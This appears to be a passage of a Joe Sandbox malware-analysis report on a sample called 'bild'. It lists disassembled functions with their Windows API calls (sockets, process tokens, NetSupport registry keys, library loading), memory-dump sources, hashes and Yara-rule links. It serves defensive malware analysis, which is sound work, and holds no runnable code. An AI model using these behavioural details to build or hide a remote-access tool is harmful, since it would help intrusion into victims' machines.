                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _calloc
                                                                                      • String ID:
                                                                                      • API String ID: 1679841372-0
                                                                                      • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                      • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                      • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                      • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                      Function 6C5D8FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 6C5D8FE4
                                                                                      • getsockname.WSOCK32(?,?,00000010,?,02852FE8,?), ref: 6C5D9005
                                                                                      • WSAGetLastError.WSOCK32(?,?,00000010,?,02852FE8,?), ref: 6C5D902E
                                                                                        • Part of subcall function 6C5D5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                      • String ID:
                                                                                      • API String ID: 3066294524-0
                                                                                      • Opcode ID: dd29d924ea5789e5c8a4c51635ed0a87f0c0d647ba8196720499a5bbafbc1bab
                                                                                      • Instruction ID: e89b7acffd834b5c6dc0d878bfb8d5a1f452ac72541fb4dbe9261f2be5f4a8f5
                                                                                      • Opcode Fuzzy Hash: dd29d924ea5789e5c8a4c51635ed0a87f0c0d647ba8196720499a5bbafbc1bab
                                                                                      • Instruction Fuzzy Hash: 751151B1E00108AFCB04DFA9DC419FFB7B8EB88214F01456ADC15E7240E770AE158B91
                                                                                      Function 11111430 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                      • __wsplitpath.LIBCMT ref: 11111475
                                                                                        • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                      • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                      • String ID:
                                                                                      • API String ID: 1847508633-0
                                                                                      • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                      • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                      • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                      • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                      Function 1109E9E0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                        • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                        • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                        • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                        • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,00C22EB8,?,00000001,00000001), ref: 1109E9A3
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                      • String ID:
                                                                                      • API String ID: 2256153495-0
                                                                                      • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                      • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                      • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                      • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                      Function 1110F720 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InitializeCriticalSection.KERNEL32(111F0908,A1BC2D8B,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
                                                                                      • EnterCriticalSection.KERNEL32(111F0908,A1BC2D8B,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
                                                                                      • LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterInitializeLeave
                                                                                      • String ID:
                                                                                      • API String ID: 3991485460-0
                                                                                      • Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                      • Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
                                                                                      • Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                      • Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92
                                                                                      Function 11068950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: ??CTL32.DLL
                                                                                      • API String ID: 1029625771-2984404022
                                                                                      • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                      • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                      • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                      • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                      Function 6C5D5840 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: inet_ntoa
                                                                                      • String ID: gfff
                                                                                      • API String ID: 1879540557-1553575800
                                                                                      • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                      • Instruction ID: 477018614ad807c104869332b51e32acb4aac172d6e7d0a05e9ed5f9057b1eb7
                                                                                      • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                      • Instruction Fuzzy Hash: 611189326083D68BC3068A2EAC602D7BFD9DB86251B2D4569D8C9CB701C611E84AC7D0
                                                                                      Function 11026B40 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DriveType
                                                                                      • String ID: ?:\
                                                                                      • API String ID: 338552980-2533537817
                                                                                      • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                      • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                      • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                      • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                      Function 110ED1A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                      • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                        • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                      Strings
                                                                                      • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseOpenwvsprintf
                                                                                      • String ID: Error %d Opening regkey %s
                                                                                      • API String ID: 1772833024-3994271378
                                                                                      • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                      • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                      • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                      • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                      Function 110ED160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                        • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                      Strings
                                                                                      • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Closewvsprintf
                                                                                      • String ID: Error %d closing regkey %x
                                                                                      • API String ID: 843752472-892920262
                                                                                      • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                      • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                      • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                      • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                      Function 111463D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,0286B8D0,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                        • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: HandleLibraryLoadModule
                                                                                      • String ID: NSMTRACE
                                                                                      • API String ID: 4133054770-4175627554
                                                                                      • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                      • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                      • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                      • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                      Function 11025CD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
